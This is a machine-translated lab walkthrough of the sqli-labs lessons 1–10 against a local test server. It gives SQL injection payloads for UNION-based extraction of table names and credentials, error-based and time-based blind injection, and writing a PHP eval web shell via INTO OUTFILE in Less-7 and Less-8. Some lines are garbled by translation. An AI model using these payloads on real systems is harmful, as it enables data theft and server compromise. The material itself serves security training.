【Shooting Range Clearance】sqli-labs less1-10

Less-1

Prompt to use ID=number as input parameter

20210503221927


http://192.168.80.131/Less-1/?id=1

20210503222204

Add a'test. The SQL syntax error is directly displayed, indicating that this is an injection point.

20210504060828


id Although the input is a numeric value, look at the source code here or try id=1' and 1=1 --+ and 'and 1=2 --+ The results are different

20210503222541

s q l = " S E L E C T ∗ F R O M u s e r s W H E R E i d = ′ sql="SELECT * FROM users WHERE id=' s q l=" S E L E C T∗F R O M u s e r s W H E R E i d=′id' LIMIT 0,1";

20210504062513


20210504063600


20210504063540
20210504063806

First find the injection point, and then guess the field. The
most direct way is to directly execute the complete statement through our input statement, which saves trouble. The common method is the union joint query.
But the joint query must know the field name or Number of fields. We don't know the name of the field. Compared with blasting the field name, guessing the number of fields is more efficient.
id=1'union select 1,2,3–+ where the number of select represents the number of fields. If the number of fields is correct,
it will be displayed normally, otherwise the internal display The used SELECT statements have a different number of columns

20210504072846


20210504072957


Of course, you can also use the sorting function order by 字段序列号to guess how many fields the current table has. Reused in union,
we know that there are 3 by trying A field. Next, we need to know that there is an echo bit, which are the fields to be displayed.
In fact, one echo bit is enough

Use id=-1 instead of id=1 so that the query statement before union will not produce results, and the first row of the result set will be the query result after union

id=-1' union select 1,2,4--+

20210504072733


For fields that do not know the data type, null NULL can be used instead, such as: id=-1' union select null,null,null--+

20210504074416
Some details of different versions of mysql are different. When
MySQL version is less than 4.0, union select is not
supported. When MySQL version is more than 5.0, there is a default database information_schema, which saves all the database information of Mysql, such as database name, table name, and field information. Name and data type and access authority, etc. The database has a data table named tables, which contains two fields, table_name and table_schema, which record the stored table name in the DBMS and the database where the table name is located.

Get data/information
Check the current database and database user name
-1' union select 1,database(),user()

20210504075026


#Check the current database version and operating system
-1' union select 1,version(),@@version_compile_os-- +The

20210504075319


conventional idea is that the closed digital type does not need to consider the problem of closure.
The character type should consider the closed search type of quotation marks' or "may be% closed, and others may still exist); etc.
Repeat the above steps, we know that the current database is security; pay attention to table_schema= for the character type to be caused by ``, otherwise the syntax error Display
Check the table name of the current library (known library name is security)
#-1' union select 1, table_name,table_schema from information_schema.tables where table_schema ='security' --+
-1' union select 1, group_concat(table_name) ,table_schema from information_schema.tables where table_schema ='security' --+

group_concat can combine the table names belonging to the table_name table into one row to display >
20210504105531


Check the column names of a table (the table is known as user)
-1' union select 1, 2, group_concat(column_name) from information_schema.columns where table_name='users '--+
group_concat can combine the column names belonging to the users table into one line to display >

20210504110058


check the value of a certain column in a table (known table name users column name username)
-1' union select 1, group_concat(username), 3 from users --+
-1' union select 1, group_concat(username),password from users where username='admin'--+

20210504110820


Several methods of mysql comment

#Single line comment
--Space MySQL single-line comment method two commonly used + replace spaces --+ oracle no spaces

id=1' and (length (database()))>3–+

Less-2

20210504112322


Access prompt get id a value as a parameter
? id=1 shows normal.

20210504112651


Try' to report sql error indicating that there is an injection point here.
Try 'and 1=1 --+ and' and 1=2 --+ both show SQL Syntax syntax error.
Try and 1=1–+ Normal and and 1=2–+ No display and no error, indicating that the syntax of the statement is correct. Just no data.
It can be judged that this is a digital injection point. This type of injection point does not need to be considered to be closed, which is simpler and more convenient.
The first lesson already knows the general field structure of the database. Here just save some steps and directly union

Number of confirmation fields

http://192.168.80.131/Less-2/?id=1 union select 1,2,3--+ Normal display
http://192.168.80.131/Less-2/?id=1 union select 1,2,3 ,4–+ SQL error, The used SELECT statements have a different number of columns
indicating that the number of fields is 3

View echo bit

Change id to -1 to invalidate the query before union. Use union select to see which fields can be displayed.
http://192.168.80.131/Less-2/?id=-1 union select 1,2,3–+

20210504114148

View the current database name

20210504114315


Learned that the former database was named security

View the name of the table that exists in the current database

http://192.168.80.131/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='security' --+

20210504114935

View the column names of a table

http://192.168.80.131/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

20210504115443


-1 union select 1, group_concat(username) ,password from users'

20210504115942


-1 union select 1,group_concat(username) ,password from users where username='admin'

20210504115857

Less-3

20210504120202


use near''1'') LIMIT 0,1' at line 1
Pay attention to the error report indicating that there is an original SQL statement and another) What is the
difference between the old routines and observations
? id=1' reports SQL syntax error, indicating that there is an injection point
?id=1and 1=2–+ and ?id=1and 1=1–+ are displayed normally, indicating that the non-digital type
?id=1'and 1=2–+ and ?id=1'and 1=1–+ are both The display syntax error may be a closing problem.
Combine the error report of'Try to add) Close
http://192.168.80.131/Less-3/?id=1')–+ Normal display indicates that the closing is successful.
Refer to the previous less-l less-2 to get
http://192.168.80.131/Less-3/?id=-1') union select 1,2,3--+

20210504121416


http://192.168.80.131/Less-3/? id=-1') union select 1, group_concat(username) ,password from users where username='admin'–+

20210504121530

Less-4

The old routine?id=1' is found to be an error, and
and'and are also normal. If http://192.168.80.131/Less-4/?id=1' is normal,

20210504121658


it may be considered that there is no injection point. But we know that there must be an injection point, and we suspect that it may have been filtered or replaced by some kind of filtering.
Try "and found an error right syntax to use near'"1"") LIMIT 0,1' at line 1

20210504122405


See the ID should be closed with double quotes
http://192.168.80.131/Less-4/?id=-1 ") union select 1,2,3 --+

20210504122656


http://192.168.80.131/Less-4/?id=-1") union select 1,username,password from users where username='admin'–+

20210504122834

Less-5

http://192.168.80.131/Less-5/?id=1

20210504122942


http://192.168.80.131/Less-5/?id=1'
right syntax to use near''1'' LIMIT 0,1' at Line 1 indicates that there is an injection point, and'–+ should be able to close
http://192.168.80.131/Less-5/?id=1'–+

20210504123643


can indeed be closed,
try id=1 id=2 and it will show You are in... That is to say, there is no echo, and there is no relevant information when looking up the HTML response. It is estimated that the test site is a blind injection
attempt.'id=1 and 1=1–+ Normal display and'id=1 and 1=2–+ No display indicates that the characters are stored Boolean type Injection.
?id=1' and length(“abc”)=2–+
?id=1' and length(“abc”)=3–+

http://192.168.80.131/Less-5/?id=1' union select 1,count(*), concat((select database()),":", floor(rand()*2))as a from information_schema.tables group by a–+

http://192.168.80.131/Less-5/?id=1' union select 1,count(*), concat((select password from users where username='admin' limit 0,1),":", floor (rand()*2))as a from information_schema.tables group by a–+

20210504143320

Less-6

Same as less-5'change"

20210504151019

Less-7

/?id=1' Report a grammatical error directly, but it is an error that has been abnormally handled.
There is no possible closing character in the error report

20210504152159


'))

http://192.168.80.131/Less-7/?id=1'))–+

20210504152221

Closing is successful. The
current problem is that the queried data has no display bits, so you can't see the result directly like looking at the result through a statement,

20210504162941


http://192.168.80.131/Less-7/?id=-1')) union select 1,2,3 into outfile "/var/lib/mysql/abcd.php"–+ Attempt to write to the file.
Note the select after id=-1 nunion
http://192.168.80.131/Less-7/?id=-1')) union select 1,"<?php @eval($_POST['chopper']);? >",3 into outfile "/var/lib/mysql/123456.php" --+
Then go to the local folder to check whether the file is written successfully. Note that the writing here is successful but there is still a syntax error on the page.

20210504163249


The path under windows \ Note the use of \ to change the meaning.
Note that when using the database file permission to write a file to the operating system, the file with the same file name cannot be overwritten, so if you Upload chao.php once, and upload chao.php next time, the command is invalid, that is, the content in the new chao, php will not be overwritten, the previous chao.php

Less-8

http://192.168.80.131/Less-8/?id=-1' union select 1,"<?php @eval($_POST['chopper']);?>",3 into outfile “/var/lib /mysql/1234567.php" --+

20210504165440

Less-9

Try id=1 id=2 id=-1 id=1 id=" id=1'–+ id=1" --+ are displayed as the same page.
Guessing may only return the Boolean type of blind note on this page. Method judgment. Try time-based injection

http://192.168.80.131/Less-9/?id=1' and sleep(5)–+The

20210504170856


time injection efficiency is the lowest, and the delay of the network may also lead to misjudgment.
There are judgment points that can be combined with the interception character function to enumerate the data bit by bit.

Less-10

http://192.168.80.131/Less-10/?id=1" and sleep(5)–+
Similar to less-9, but the closing symbol is not "为"